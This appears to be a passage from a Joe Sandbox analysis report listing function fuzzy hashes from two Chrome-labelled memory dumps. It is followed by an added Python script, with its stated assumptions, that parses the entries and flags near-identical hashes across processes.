                                                    • Instruction ID: fe6571b56f4a4beb9b339b106301f99e29f5a24eba06e824482c00dd34f39067
                                                    • Opcode Fuzzy Hash: d923f3c7e007bcb211e1d1d7054995fb8d70f6debd7cf39b2ae4c0292105e5b2
                                                    • Instruction Fuzzy Hash: AC21D67A654E4D5FD750EB2CC4949AE7F71FF88300B8188E4D849C779ADE38A901CB41
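The entries above come from two different process dumps (snapshot files hcaresult_22_2_7ffaab7a0000 and hcaresult_25_2_7ffaab7b0000, both labelled Google Chrome, both "based on PE: false"), and several Instruction Fuzzy Hash values differ in only a handful of hex positions between the two. The following script is an added example, not part of the Joe Sandbox report and not Joe Sandbox's own code: it parses entries in the exact layout shown on this page (the sample input is copied verbatim from three of the entries above) and reports functions whose fuzzy hashes nearly agree across processes. The comparison metric (fraction of matching hex nibbles at the same position) is an assumption made here for illustration; the report does not document how its own Similarity score is computed, and a real workflow would use the vendor's similarity output or a proper fuzzy-hash comparison.

```python
"""Parse Joe Sandbox function entries ("Snapshot File" / "Opcode ID" /
"Instruction Fuzzy Hash") and flag functions whose instruction fuzzy hashes agree
closely across dumps from different processes. Added example for this page; the
input is copied from the entries above (processes 22 and 25). The positional
nibble similarity is an assumption, not Joe Sandbox's Similarity computation."""
import re
from itertools import combinations

REPORT_EXCERPT = """\
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_22_2_7ffaab7a0000_Google Chrome.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: d741c102585670246797f85f1e6d2eac4f48375a5fe5ec687f62ef4bcce1466a
• Instruction ID: 066d5cf18f932706d4f24142d9ebb86ba15a3628c1a94be8c741039da6bc7d4e
• Opcode Fuzzy Hash: d741c102585670246797f85f1e6d2eac4f48375a5fe5ec687f62ef4bcce1466a
• Instruction Fuzzy Hash: 28218152B1590A8FFB94BBBCD80A7FC72D6EF98751F10457AE00DC3292DD28A8014381
Strings
Memory Dump Source
• Source File: 00000019.00000002.1991420058.00007FFAAB7B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB7B0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_25_2_7ffaab7b0000_Google Chrome.jbxd
Similarity
• API ID:
• String ID: 6g$6g$6g$6g$"rg$0Dq$8Mq$U
• API String ID: 0-574773328
• Opcode ID: 01895c42105374b7181bf5c0023ad68d31cf432fc5aa9d5a153c5a8f30174987
• Instruction ID: 0d151cec20ccc241f92073453d1d62961271b4ff950e7987e8313cf230e6bb11
• Opcode Fuzzy Hash: 01895c42105374b7181bf5c0023ad68d31cf432fc5aa9d5a153c5a8f30174987
• Instruction Fuzzy Hash: C922E971B29A498FE758EB3CC4596BD77E2FF99340F408579D44EC36E2DE28A8018781
Memory Dump Source
• Source File: 00000019.00000002.1991420058.00007FFAAB7B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB7B0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_25_2_7ffaab7b0000_Google Chrome.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: b5aa8c69adcf3a91edd0d414085a76b56429874fd5d3807d72c178753b48059a
• Instruction ID: 5fcb5fa5bce5f27ec977383a8da10fd4d58f5daba7a31d3df353410fe18792f5
• Opcode Fuzzy Hash: b5aa8c69adcf3a91edd0d414085a76b56429874fd5d3807d72c178753b48059a
• Instruction Fuzzy Hash: CC218151B1490A8BFB94BBBCD80A7FC62D6EF98751F10817AE00EC32D2DD28A8014791
"""

FIELD_RE = re.compile(r"^\s*•\s*([^:]+):\s*(.*)$")
# Snapshot name layout as seen on the page: hcaresult_<pid>_<n>_<base address>_<process name>.jbxd
SNAPSHOT_RE = re.compile(r"^hcaresult_(\d+)_\d+_([0-9a-fA-F]+)_")


def parse_entries(text):
    """One dict per function entry. Header lines without a bullet are skipped;
    'Instruction Fuzzy Hash' is the last field of every entry, so it closes the
    record. This also copes with an excerpt that starts mid-entry."""
    entries, current = [], {}
    for line in text.splitlines():
        m = FIELD_RE.match(line)
        if not m:
            continue
        key, value = m.group(1).strip(), m.group(2).strip()
        current[key] = value
        if key == "Instruction Fuzzy Hash":
            snap = SNAPSHOT_RE.match(current.get("Snapshot File", ""))
            current["process"] = int(snap.group(1)) if snap else None
            current["base"] = int(snap.group(2), 16) if snap else None
            entries.append(current)
            current = {}
    return entries


def nibble_similarity(h1, h2):
    """Fraction of positions at which two equal-length hex hashes agree.
    Assumed metric for this example; different lengths score 0.0 rather than
    guessing an alignment."""
    h1, h2 = h1.upper(), h2.upper()
    if not h1 or len(h1) != len(h2):
        return 0.0
    return sum(a == b for a, b in zip(h1, h2)) / len(h1)


def cross_process_matches(entries, threshold=0.75):
    """(opcode_id_a, opcode_id_b, score) for entry pairs from different processes
    whose instruction fuzzy hashes agree at >= threshold of positions."""
    hits = []
    for a, b in combinations(entries, 2):
        if a["process"] == b["process"]:
            continue
        score = nibble_similarity(a["Instruction Fuzzy Hash"], b["Instruction Fuzzy Hash"])
        if score >= threshold:
            hits.append((a["Opcode ID"], b["Opcode ID"], round(score, 3)))
    return sorted(hits, key=lambda t: -t[2])


if __name__ == "__main__":
    recs = parse_entries(REPORT_EXCERPT)
    print(f"parsed {len(recs)} entries from processes {sorted({r['process'] for r in recs})}")
    for a_id, b_id, score in cross_process_matches(recs):
        print(f"{score:.3f}  {a_id[:16]}...  ~  {b_id[:16]}...")
```

On the three entries embedded above, the only cross-process hit is the pair d741c102... (process 22, base 0x7FFAAB7A0000) and b5aa8c69... (process 25, base 0x7FFAAB7B0000), which agree at 58 of 70 hex positions; the other cross-process pair scores well below the threshold. Both Opcode IDs differ, so a strict hash match would have missed them; the near-identical fuzzy hashes are what a practitioner would use to argue that the same non-PE-backed code was present in both processes and to pick which dump to load into a disassembler first.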